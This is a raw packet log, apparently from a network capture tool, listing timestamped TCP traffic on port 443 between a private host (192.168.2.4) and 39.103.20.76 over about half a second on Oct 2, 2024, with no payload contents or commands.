Oct 2, 2024 04:27:37.039349079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039359093 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039364100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039390087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039397955 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039764881 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039818048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039840937 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039889097 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040003061 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040050983 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040076017 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040103912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040118933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040123940 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040139914 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040170908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040224075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040273905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040685892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040739059 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.040767908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.040810108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042057037 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042107105 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042124033 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042172909 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042237043 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042268991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042289019 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042295933 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042308092 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042332888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042337894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042347908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042387009 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042391062 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042401075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042437077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042485952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042521000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042536020 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042541027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042556047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042557955 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042581081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042587042 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042601109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042629957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042654037 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042707920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042773962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042808056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042821884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042833090 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042844057 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042874098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042885065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042890072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042901993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042918921 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042937994 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042942047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.042967081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.042988062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.043020010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.043051004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.043068886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.043075085 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.043088913 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.043117046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.118433952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.118525982 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.118558884 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.118617058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130258083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130357027 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130373001 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130426884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130479097 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130538940 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130597115 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130647898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130702019 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130702972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130760908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130803108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130855083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.130903006 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.130958080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131022930 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131082058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131136894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131186962 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131232977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131289005 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131333113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131392002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131448984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131505966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131809950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131866932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.131912947 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.131964922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133130074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133187056 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133241892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133292913 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133338928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133390903 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133433104 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133485079 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133524895 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133579969 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133619070 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133672953 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133739948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133791924 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133853912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.133905888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.133950949 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134005070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134038925 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134088039 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134133101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134187937 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134227991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134284973 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134314060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134371042 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134413958 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134469986 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134510040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134563923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.134599924 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.134649038 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.209589958 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.209697008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.209708929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.209733963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.209769964 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.209789038 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221446991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.221519947 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221539021 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.221589088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221637011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.221688032 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221752882 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.221810102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221868038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.221919060 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.221961975 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222012043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222055912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222110987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222162962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222213984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222279072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222333908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222388983 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222440004 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222485065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222536087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222590923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222641945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222876072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.222934008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.222976923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.223030090 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.224411011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.224467993 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.224498987 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.224553108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.224616051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.224669933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.224755049 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.224807978 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.224924088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.224999905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225070953 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225128889 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225163937 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225215912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225259066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225312948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225353956 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225409031 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225450039 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225502968 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225545883 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225610971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225655079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225704908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225753069 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225806952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225847960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.225900888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.225944996 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.226000071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.226025105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.226084948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.300656080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.300761938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.300770998 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.300796032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.300825119 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.300837040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.312592030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.312669039 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.312697887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.312772036 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.312798023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.312859058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.312916994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.312968016 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313020945 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313072920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313137054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313185930 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313252926 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313307047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313369036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313421965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313482046 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313534021 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313577890 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313630104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313677073 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313729048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313802004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313851118 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.313909054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.313958883 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315195084 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315243959 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315356016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315409899 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315479994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315529108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315579891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315632105 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315694094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315747976 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315797091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315850019 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.315896988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.315946102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316016912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316070080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316143036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316195965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316258907 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316307068 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316358089 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316406012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316451073 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316502094 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316549063 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316602945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316647053 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316709995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316745043 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316801071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.316833973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.316884995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.391710997 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.391774893 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.391820908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.391872883 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.403548956 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.403621912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.403696060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.403749943 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.403829098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.403886080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.403945923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404023886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404073000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404119968 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404181004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404231071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404314041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404364109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404407978 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404459000 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404529095 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404582024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404622078 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404675007 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404735088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404788971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.404823065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.404871941 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.405085087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.405138969 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.405183077 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.405234098 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406280041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406335115 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406387091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406441927 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406498909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406544924 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406613111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406666994 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406727076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406778097 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406826973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.406878948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.406941891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407011032 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407083988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407129049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407191038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407246113 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407305002 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407357931 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407416105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407468081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407512903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407567024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407618046 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407666922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407716036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407769918 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407813072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407862902 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.407900095 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.407951117 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.482959986 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.483102083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.483115911 CEST	443	49740	39.103.20.76	192.168.2.4
